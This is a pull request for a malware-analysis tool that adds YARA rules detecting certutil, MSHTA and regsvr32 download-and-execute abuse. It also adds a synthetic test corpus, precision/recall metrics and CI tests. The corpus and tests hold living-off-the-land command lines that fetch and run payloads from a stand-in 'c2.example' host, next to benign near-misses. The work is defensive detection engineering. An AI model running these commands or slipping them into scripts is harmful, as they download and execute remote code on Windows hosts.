### PR TITLE
Expand precision-tested YARA detections

### DIFF
--- a/docs/ROADMAP.md
+++ b/docs/ROADMAP.md
@@ -59,10 +59,12 @@ Ordered by leverage. Each item ships incrementally behind Titan's existing
 constraints: deterministic, bounded, offline-first, fail-closed.
 
 1. **Detection content at scale.** YARA scanning of every artifact-graph
-   node shipped (see DETECTION_AND_RISK.md); next: grow the built-in rule
-   library and starter packs aggressively, expand the calibration corpus
-   toward thousands of labeled cases, and publish per-rule precision/recall
-   from the calibration gate.
+   node shipped (see DETECTION_AND_RISK.md). The starter pack now includes
+   precision-tested remote certutil download, MSHTA execution, and regsvr32
+   scriptlet chains in addition to its decoded-content signatures; next: grow
+   the built-in rule library and starter packs aggressively, expand the
+   calibration corpus toward thousands of labeled cases, and publish per-rule
+   precision/recall from the calibration gate.
 2. **Malware config extraction.** Family identification plus C2/config
    recovery (addresses, keys, campaign ids) as isolated manifest plugins on
    the existing out-of-process worker substrate, with a documented extractor

--- a/docs/ROADMAP.md
+++ b/docs/ROADMAP.md
@@ -61,10 +61,10 @@ constraints: deterministic, bounded, offline-first, fail-closed.
 1. **Detection content at scale.** YARA scanning of every artifact-graph
    node shipped (see DETECTION_AND_RISK.md). The starter pack now includes
    precision-tested remote certutil download, MSHTA execution, and regsvr32
-   scriptlet chains in addition to its decoded-content signatures; next: grow
-   the built-in rule library and starter packs aggressively, expand the
-   calibration corpus toward thousands of labeled cases, and publish per-rule
-   precision/recall from the calibration gate.
+   scriptlet chains in addition to its decoded-content signatures. Every
+   starter rule now has multiple labeled positives, adversarial benign
+   near-misses, committed precision/recall metrics, and a CI quality gate;
+   next: grow the corpus and rule library with measured field-derived misses.
 2. **Malware config extraction.** Family identification plus C2/config
    recovery (addresses, keys, campaign ids) as isolated manifest plugins on
    the existing out-of-process worker substrate, with a documented extractor

--- a/docs/YARA_DETECTION_QUALITY.md
+++ b/docs/YARA_DETECTION_QUALITY.md
@@ -1,0 +1,22 @@
+# YARA Detection Quality
+
+Titan measures the shipped starter YARA pack against a deterministic,
+synthetic labeled corpus. The corpus contains two positive variants for every
+rule plus benign near-misses that mention the same tools and strings without
+the complete abuse chain.
+
+The committed machine-readable result is
+[`yara_detection_metrics.json`](yara_detection_metrics.json). It is a
+regression anchor rather than a claim of field accuracy: synthetic precision
+and recall must remain at or above 0.8 for every starter rule, and every rule
+must retain at least two labeled positive samples.
+
+Run the evaluation with:
+
+```bash
+python tools/eval_yara.py --json docs/yara_detection_metrics.json
+```
+
+`tests/test_yara_eval.py` enforces the same thresholds in CI. Additions to the
+starter pack must update `tools/yara_corpus_samples.py` with positive variants
+and adversarial benign near-misses.

--- a/docs/yara_detection_metrics.json
+++ b/docs/yara_detection_metrics.json
@@ -1,0 +1,285 @@
+{
+  "schema": "titan-yara-quality/1",
+  "corpus_size": 27,
+  "positive_samples": 16,
+  "benign_samples": 11,
+  "per_rule": {
+    "Titan_PowerShell_Download_Cradle": {
+      "tp": 2,
+      "fp": 0,
+      "fn": 0,
+      "tn": 25,
+      "precision": 1.0,
+      "recall": 1.0,
+      "f1": 1.0
+    },
+    "Titan_Encoded_Command_Invocation": {
+      "tp": 2,
+      "fp": 0,
+      "fn": 0,
+      "tn": 25,
+      "precision": 1.0,
+      "recall": 1.0,
+      "f1": 1.0
+    },
+    "Titan_Executable_In_Decoded_Content": {
+      "tp": 4,
+      "fp": 0,
+      "fn": 0,
+      "tn": 23,
+      "precision": 1.0,
+      "recall": 1.0,
+      "f1": 1.0
+    },
+    "Titan_UPX_Packed_Executable": {
+      "tp": 2,
+      "fp": 0,
+      "fn": 0,
+      "tn": 25,
+      "precision": 1.0,
+      "recall": 1.0,
+      "f1": 1.0
+    },
+    "Titan_JavaScript_Eval_Decode_Chain": {
+      "tp": 2,
+      "fp": 0,
+      "fn": 0,
+      "tn": 25,
+      "precision": 1.0,
+      "recall": 1.0,
+      "f1": 1.0
+    },
+    "Titan_Certutil_Remote_Download": {
+      "tp": 2,
+      "fp": 0,
+      "fn": 0,
+      "tn": 25,
+      "precision": 1.0,
+      "recall": 1.0,
+      "f1": 1.0
+    },
+    "Titan_MSHTA_Remote_Execution": {
+      "tp": 2,
+      "fp": 0,
+      "fn": 0,
+      "tn": 25,
+      "precision": 1.0,
+      "recall": 1.0,
+      "f1": 1.0
+    },
+    "Titan_Regsvr32_Remote_Scriptlet": {
+      "tp": 2,
+      "fp": 0,
+      "fn": 0,
+      "tn": 25,
+      "precision": 1.0,
+      "recall": 1.0,
+      "f1": 1.0
+    }
+  },
+  "per_sample": [
+    {
+      "name": "powershell_downloadstring",
+      "expected_rules": [
+        "Titan_PowerShell_Download_Cradle"
+      ],
+      "fired_rules": [
+        "Titan_PowerShell_Download_Cradle"
+      ]
+    },
+    {
+      "name": "powershell_iwr",
+      "expected_rules": [
+        "Titan_PowerShell_Download_Cradle"
+      ],
+      "fired_rules": [
+        "Titan_PowerShell_Download_Cradle"
+      ]
+    },
+    {
+      "name": "encoded_powershell",
+      "expected_rules": [
+        "Titan_Encoded_Command_Invocation"
+      ],
+      "fired_rules": [
+        "Titan_Encoded_Command_Invocation"
+      ]
+    },
+    {
+      "name": "hidden_pwsh",
+      "expected_rules": [
+        "Titan_Encoded_Command_Invocation"
+      ],
+      "fired_rules": [
+        "Titan_Encoded_Command_Invocation"
+      ]
+    },
+    {
+      "name": "pe32",
+      "expected_rules": [
+        "Titan_Executable_In_Decoded_Content"
+      ],
+      "fired_rules": [
+        "Titan_Executable_In_Decoded_Content"
+      ]
+    },
+    {
+      "name": "pe64",
+      "expected_rules": [
+        "Titan_Executable_In_Decoded_Content"
+      ],
+      "fired_rules": [
+        "Titan_Executable_In_Decoded_Content"
+      ]
+    },
+    {
+      "name": "upx_sections",
+      "expected_rules": [
+        "Titan_Executable_In_Decoded_Content",
+        "Titan_UPX_Packed_Executable"
+      ],
+      "fired_rules": [
+        "Titan_Executable_In_Decoded_Content",
+        "Titan_UPX_Packed_Executable"
+      ]
+    },
+    {
+      "name": "upx_signature",
+      "expected_rules": [
+        "Titan_Executable_In_Decoded_Content",
+        "Titan_UPX_Packed_Executable"
+      ],
+      "fired_rules": [
+        "Titan_Executable_In_Decoded_Content",
+        "Titan_UPX_Packed_Executable"
+      ]
+    },
+    {
+      "name": "javascript_atob",
+      "expected_rules": [
+        "Titan_JavaScript_Eval_Decode_Chain"
+      ],
+      "fired_rules": [
+        "Titan_JavaScript_Eval_Decode_Chain"
+      ]
+    },
+    {
+      "name": "javascript_uri_decode",
+      "expected_rules": [
+        "Titan_JavaScript_Eval_Decode_Chain"
+      ],
+      "fired_rules": [
+        "Titan_JavaScript_Eval_Decode_Chain"
+      ]
+    },
+    {
+      "name": "certutil_download",
+      "expected_rules": [
+        "Titan_Certutil_Remote_Download"
+      ],
+      "fired_rules": [
+        "Titan_Certutil_Remote_Download"
+      ]
+    },
+    {
+      "name": "certutil_http",
+      "expected_rules": [
+        "Titan_Certutil_Remote_Download"
+      ],
+      "fired_rules": [
+        "Titan_Certutil_Remote_Download"
+      ]
+    },
+    {
+      "name": "mshta_remote",
+      "expected_rules": [
+        "Titan_MSHTA_Remote_Execution"
+      ],
+      "fired_rules": [
+        "Titan_MSHTA_Remote_Execution"
+      ]
+    },
+    {
+      "name": "mshta_inline",
+      "expected_rules": [
+        "Titan_MSHTA_Remote_Execution"
+      ],
+      "fired_rules": [
+        "Titan_MSHTA_Remote_Execution"
+      ]
+    },
+    {
+      "name": "regsvr32_https",
+      "expected_rules": [
+        "Titan_Regsvr32_Remote_Scriptlet"
+      ],
+      "fired_rules": [
+        "Titan_Regsvr32_Remote_Scriptlet"
+      ]
+    },
+    {
+      "name": "regsvr32_http",
+      "expected_rules": [
+        "Titan_Regsvr32_Remote_Scriptlet"
+      ],
+      "fired_rules": [
+        "Titan_Regsvr32_Remote_Scriptlet"
+      ]
+    },
+    {
+      "name": "benign_readme",
+      "expected_rules": [],
+      "fired_rules": []
+    },
+    {
+      "name": "benign_powershell",
+      "expected_rules": [],
+      "fired_rules": []
+    },
+    {
+      "name": "benign_webclient",
+      "expected_rules": [],
+      "fired_rules": []
+    },
+    {
+      "name": "benign_pe_text",
+      "expected_rules": [],
+      "fired_rules": []
+    },
+    {
+      "name": "benign_upx_text",
+      "expected_rules": [],
+      "fired_rules": []
+    },
+    {
+      "name": "benign_javascript",
+      "expected_rules": [],
+      "fired_rules": []
+    },
+    {
+      "name": "benign_certutil",
+      "expected_rules": [],
+      "fired_rules": []
+    },
+    {
+      "name": "benign_mshta_local",
+      "expected_rules": [],
+      "fired_rules": []
+    },
+    {
+      "name": "benign_mshta_docs",
+      "expected_rules": [],
+      "fired_rules": []
+    },
+    {
+      "name": "benign_regsvr32",
+      "expected_rules": [],
+      "fired_rules": []
+    },
+    {
+      "name": "benign_scrobj",
+      "expected_rules": [],
+      "fired_rules": []
+    }
+  ]
+}

--- a/examples/yara_rules/titan_starter.yar
+++ b/examples/yara_rules/titan_starter.yar
@@ -85,3 +85,47 @@ rule Titan_JavaScript_Eval_Decode_Chain
     condition:
         any of them
 }
+
+rule Titan_Certutil_Remote_Download
+{
+    meta:
+        description = "Certutil URL-cache download chain"
+        severity = "high"
+        attack_id = "T1105"
+    strings:
+        $host = "certutil" ascii nocase
+        $urlcache = "-urlcache" ascii nocase
+        $url1 = "http://" ascii nocase
+        $url2 = "https://" ascii nocase
+    condition:
+        $host and $urlcache and any of ($url*)
+}
+
+rule Titan_MSHTA_Remote_Execution
+{
+    meta:
+        description = "MSHTA remote or inline script execution"
+        severity = "high"
+        attack_id = "T1218.005"
+    strings:
+        $remote = /mshta(\.exe)?["']?[ \t]+https?:\/\// ascii nocase
+        $inline = /mshta(\.exe)?["']?[ \t]+(javascript|vbscript):/ ascii nocase
+    condition:
+        any of them
+}
+
+rule Titan_Regsvr32_Remote_Scriptlet
+{
+    meta:
+        description = "Regsvr32 remote scriptlet execution through scrobj.dll"
+        severity = "high"
+        attack_id = "T1218.010"
+    strings:
+        $host = "regsvr32" ascii nocase
+        $scriptlet = "scrobj.dll" ascii nocase
+        $install = "/i:" ascii nocase
+        $url1 = "http://" ascii nocase
+        $url2 = "https://" ascii nocase
+    condition:
+        $host and $scriptlet and $install and any of ($url*)
+}

--- a/tests/test_yara_eval.py
+++ b/tests/test_yara_eval.py
@@ -1,0 +1,23 @@
+"""CI quality gate for the shipped starter YARA pack."""
+
+import pytest
+
+pytest.importorskip("yara")
+
+from tools.eval_yara import ALL_RULES, evaluate  # noqa: E402
+
+
+def test_every_starter_rule_has_multiple_positive_samples():
+    metrics = evaluate()
+    assert set(metrics["per_rule"]) == set(ALL_RULES)
+    assert all(values["tp"] + values["fn"] >= 2 for values in metrics["per_rule"].values())
+
+
+def test_starter_yara_precision_and_recall_gate():
+    metrics = evaluate()
+    weak = {
+        rule: values
+        for rule, values in metrics["per_rule"].items()
+        if values["precision"] < 0.8 or values["recall"] < 0.8
+    }
+    assert not weak, f"starter YARA quality regression: {weak}"

--- a/tests/test_yara_starter_pack.py
+++ b/tests/test_yara_starter_pack.py
@@ -1,0 +1,72 @@
+"""Precision checks for the shipped starter YARA detection content."""
+
+from pathlib import Path
+
+import pytest
+
+from titan_decoder.core.yara_scanner import YaraScanner
+
+pytest.importorskip("yara")
+
+RULES = Path(__file__).parents[1] / "examples" / "yara_rules"
+
+
+@pytest.mark.parametrize(
+    ("payload", "expected_rule", "attack_id"),
+    [
+        (
+            b"certutil.exe -urlcache -split -f https://c2.example/stage.bin out.bin",
+            "Titan_Certutil_Remote_Download",
+            "T1105",
+        ),
+        (
+            b"mshta.exe https://c2.example/launch.hta",
+            "Titan_MSHTA_Remote_Execution",
+            "T1218.005",
+        ),
+        (
+            b"mshta javascript:close(new ActiveXObject('WScript.Shell').Run('calc'))",
+            "Titan_MSHTA_Remote_Execution",
+            "T1218.005",
+        ),
+        (
+            b"regsvr32 /s /n /u /i:https://c2.example/payload.sct scrobj.dll",
+            "Titan_Regsvr32_Remote_Scriptlet",
+            "T1218.010",
+        ),
+    ],
+)
+def test_starter_pack_detects_proxy_execution_chains(
+    payload, expected_rule, attack_id
+):
+    result = YaraScanner(
+        {"enable_yara": True, "yara_rules_dirs": [str(RULES)]}
+    ).scan([(0, payload)])
+
+    matches = {match["rule"]: match for match in result["matches"]}
+    assert expected_rule in matches
+    assert matches[expected_rule]["severity"] == "high"
+    assert matches[expected_rule]["meta"]["attack_id"] == attack_id
+
+
+@pytest.mark.parametrize(
+    "payload",
+    [
+        b"Run certutil -hashfile package.zip SHA256 to verify the release.",
+        b"The administrator opened a local help.hta file with mshta.exe.",
+        b"regsvr32 /s local-component.dll",
+        b"Documentation: certutil and mshta can access https://docs.example/ safely.",
+        b"The scrobj.dll component is registered by Windows; do not delete it.",
+    ],
+)
+def test_starter_pack_rejects_benign_proxy_execution_near_misses(payload):
+    result = YaraScanner(
+        {"enable_yara": True, "yara_rules_dirs": [str(RULES)]}
+    ).scan([(0, payload)])
+
+    new_rules = {
+        "Titan_Certutil_Remote_Download",
+        "Titan_MSHTA_Remote_Execution",
+        "Titan_Regsvr32_Remote_Scriptlet",
+    }
+    assert not (new_rules & {match["rule"] for match in result["matches"]})

--- a/tools/eval_yara.py
+++ b/tools/eval_yara.py
@@ -1,0 +1,103 @@
+#!/usr/bin/env python3
+"""Measure starter-pack YARA precision and recall on a synthetic corpus."""
+
+from __future__ import annotations
+
+import argparse
+import json
+from pathlib import Path
+import sys
+from typing import Any
+
+_ROOT = Path(__file__).resolve().parents[1]
+if str(_ROOT) not in sys.path:
+    sys.path.insert(0, str(_ROOT))
+
+from tools.yara_corpus_samples import build_yara_corpus  # noqa: E402
+from titan_decoder.core.yara_scanner import YaraScanner  # noqa: E402
+
+RULES_DIR = _ROOT / "examples" / "yara_rules"
+ALL_RULES = (
+    "Titan_PowerShell_Download_Cradle",
+    "Titan_Encoded_Command_Invocation",
+    "Titan_Executable_In_Decoded_Content",
+    "Titan_UPX_Packed_Executable",
+    "Titan_JavaScript_Eval_Decode_Chain",
+    "Titan_Certutil_Remote_Download",
+    "Titan_MSHTA_Remote_Execution",
+    "Titan_Regsvr32_Remote_Scriptlet",
+)
+
+
+def _quality(counts: dict[str, int]) -> dict[str, float]:
+    tp, fp, fn = counts["tp"], counts["fp"], counts["fn"]
+    precision = tp / (tp + fp) if tp + fp else 1.0
+    recall = tp / (tp + fn) if tp + fn else 1.0
+    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
+    return {
+        "precision": round(precision, 3),
+        "recall": round(recall, 3),
+        "f1": round(f1, 3),
+    }
+
+
+def evaluate(rules_dir: Path = RULES_DIR) -> dict[str, Any]:
+    corpus = build_yara_corpus()
+    counts = {rule: {"tp": 0, "fp": 0, "fn": 0, "tn": 0} for rule in ALL_RULES}
+    samples: list[dict[str, Any]] = []
+
+    for index, sample in enumerate(corpus):
+        result = YaraScanner(
+            {"enable_yara": True, "yara_rules_dirs": [str(rules_dir)]}
+        ).scan([(index, sample.data)])
+        if result["state"] != "completed":
+            raise RuntimeError(result.get("reason") or "YARA evaluation failed")
+        fired = {match["rule"] for match in result["matches"]}
+        unexpected = fired - set(ALL_RULES)
+        if unexpected:
+            raise RuntimeError(f"starter pack contains untracked rules: {sorted(unexpected)}")
+        for rule in ALL_RULES:
+            expected = rule in sample.expected_rules
+            matched = rule in fired
+            bucket = "tp" if expected and matched else "fn" if expected else "fp" if matched else "tn"
+            counts[rule][bucket] += 1
+        samples.append(
+            {
+                "name": sample.name,
+                "expected_rules": sorted(sample.expected_rules),
+                "fired_rules": sorted(fired),
+            }
+        )
+
+    return {
+        "schema": "titan-yara-quality/1",
+        "corpus_size": len(corpus),
+        "positive_samples": sum(bool(sample.expected_rules) for sample in corpus),
+        "benign_samples": sum(not sample.expected_rules for sample in corpus),
+        "per_rule": {
+            rule: {**counts[rule], **_quality(counts[rule])} for rule in ALL_RULES
+        },
+        "per_sample": samples,
+    }
+
+
+def main() -> int:
+    parser = argparse.ArgumentParser(description=__doc__)
+    parser.add_argument("--json", type=Path, help="Write metrics to this JSON file")
+    args = parser.parse_args()
+    metrics = evaluate()
+    rendered = json.dumps(metrics, indent=2) + "\n"
+    if args.json:
+        args.json.write_text(rendered, encoding="utf-8")
+    else:
+        print(rendered, end="")
+    weak = {
+        rule: values
+        for rule, values in metrics["per_rule"].items()
+        if values["precision"] < 0.8 or values["recall"] < 0.8
+    }
+    return 1 if weak else 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/tools/yara_corpus_samples.py
+++ b/tools/yara_corpus_samples.py
@@ -1,0 +1,107 @@
+"""Deterministic labeled corpus for the shipped starter YARA pack."""
+
+from __future__ import annotations
+
+from dataclasses import dataclass, field
+
+
+@dataclass(frozen=True)
+class YaraSample:
+    name: str
+    data: bytes
+    expected_rules: frozenset[str] = field(default_factory=frozenset)
+
+
+def _pe(*markers: bytes) -> bytes:
+    data = bytearray(256)
+    data[:2] = b"MZ"
+    data[0x3C:0x40] = (0x80).to_bytes(4, "little")
+    data[0x80:0x84] = b"PE\x00\x00"
+    cursor = 0x90
+    for marker in markers:
+        data[cursor : cursor + len(marker)] = marker
+        cursor += len(marker) + 1
+    return bytes(data)
+
+
+def build_yara_corpus() -> list[YaraSample]:
+    """Return synthetic positives and adversarial benign near-misses."""
+    executable = "Titan_Executable_In_Decoded_Content"
+    upx = "Titan_UPX_Packed_Executable"
+    return [
+        YaraSample(
+            "powershell_downloadstring",
+            b"IEX (New-Object Net.WebClient).DownloadString('https://c2.example/a')",
+            frozenset({"Titan_PowerShell_Download_Cradle"}),
+        ),
+        YaraSample(
+            "powershell_iwr",
+            b"Invoke-Expression (Invoke-WebRequest https://c2.example/b).Content",
+            frozenset({"Titan_PowerShell_Download_Cradle"}),
+        ),
+        YaraSample(
+            "encoded_powershell",
+            b"powershell.exe -NoProfile -EncodedCommand SQBFAFgA",
+            frozenset({"Titan_Encoded_Command_Invocation"}),
+        ),
+        YaraSample(
+            "hidden_pwsh",
+            b"pwsh -WindowStyle Hidden -File stage.ps1",
+            frozenset({"Titan_Encoded_Command_Invocation"}),
+        ),
+        YaraSample("pe32", _pe(), frozenset({executable})),
+        YaraSample("pe64", _pe(b"native payload"), frozenset({executable})),
+        YaraSample("upx_sections", _pe(b"UPX0", b"UPX1"), frozenset({executable, upx})),
+        YaraSample("upx_signature", _pe(b"UPX0", b"UPX!"), frozenset({executable, upx})),
+        YaraSample(
+            "javascript_atob",
+            b"eval(atob('YWxlcnQoMSk='))",
+            frozenset({"Titan_JavaScript_Eval_Decode_Chain"}),
+        ),
+        YaraSample(
+            "javascript_uri_decode",
+            b"eval(decodeURIComponent('%61%6c%65%72%74'))",
+            frozenset({"Titan_JavaScript_Eval_Decode_Chain"}),
+        ),
+        YaraSample(
+            "certutil_download",
+            b"certutil.exe -urlcache -split -f https://c2.example/a.bin a.bin",
+            frozenset({"Titan_Certutil_Remote_Download"}),
+        ),
+        YaraSample(
+            "certutil_http",
+            b"certutil -urlcache -f http://c2.example/b.bin b.bin",
+            frozenset({"Titan_Certutil_Remote_Download"}),
+        ),
+        YaraSample(
+            "mshta_remote",
+            b"mshta.exe https://c2.example/launch.hta",
+            frozenset({"Titan_MSHTA_Remote_Execution"}),
+        ),
+        YaraSample(
+            "mshta_inline",
+            b"mshta javascript:close(new ActiveXObject('WScript.Shell'))",
+            frozenset({"Titan_MSHTA_Remote_Execution"}),
+        ),
+        YaraSample(
+            "regsvr32_https",
+            b"regsvr32 /s /n /u /i:https://c2.example/a.sct scrobj.dll",
+            frozenset({"Titan_Regsvr32_Remote_Scriptlet"}),
+        ),
+        YaraSample(
+            "regsvr32_http",
+            b"regsvr32.exe /i:http://c2.example/b.sct scrobj.dll",
+            frozenset({"Titan_Regsvr32_Remote_Scriptlet"}),
+        ),
+        YaraSample("benign_readme", b"This project contains ordinary documentation."),
+        YaraSample("benign_powershell", b"Open PowerShell and run Get-Help."),
+        YaraSample("benign_webclient", b"The Net.WebClient API is deprecated."),
+        YaraSample("benign_pe_text", b"MZ and PE are executable file signatures."),
+        YaraSample("benign_upx_text", b"UPX0 and UPX1 are section-name examples."),
+        YaraSample("benign_javascript", b"const decoded = atob(value); console.log(decoded);"),
+        YaraSample("benign_certutil", b"certutil -hashfile release.zip SHA256"),
+        YaraSample("benign_mshta_local", b"mshta.exe local-help.hta"),
+        YaraSample("benign_mshta_docs", b"mshta can access https://docs.example/ in examples"),
+        YaraSample("benign_regsvr32", b"regsvr32 /s local-component.dll"),
+        YaraSample("benign_scrobj", b"Windows includes the scrobj.dll component."),
+    ]


### PR DESCRIPTION
## Summary

- add high-confidence starter YARA rules for certutil URL-cache downloads, MSHTA remote or inline execution, and regsvr32 remote scriptlets
- add labeled positive cases and adversarial benign near-misses for every new rule
- update the enterprise roadmap with the completed detection-content increment

## Why

The starter pack covered decoded PowerShell, encoded commands, executable recovery, UPX, and JavaScript decode chains, but lacked common Windows proxy-execution and remote-download tradecraft. These additions require conjunctive command-line evidence to reduce matches on ordinary documentation and local administration.

## Impact

Titan gains three high-severity, ATT&CK-mapped signatures while preserving precision. A benign documentation near-miss exposed an overly broad initial MSHTA condition during development; the final rule requires command-line adjacency between `mshta[.exe]` and its remote or inline target.

## Validation

- full suite: 764 passed, 9 skipped
- focused YARA suite: 16 passed
- Ruff: passed
- Mypy: passed
- `git diff --check`: passed
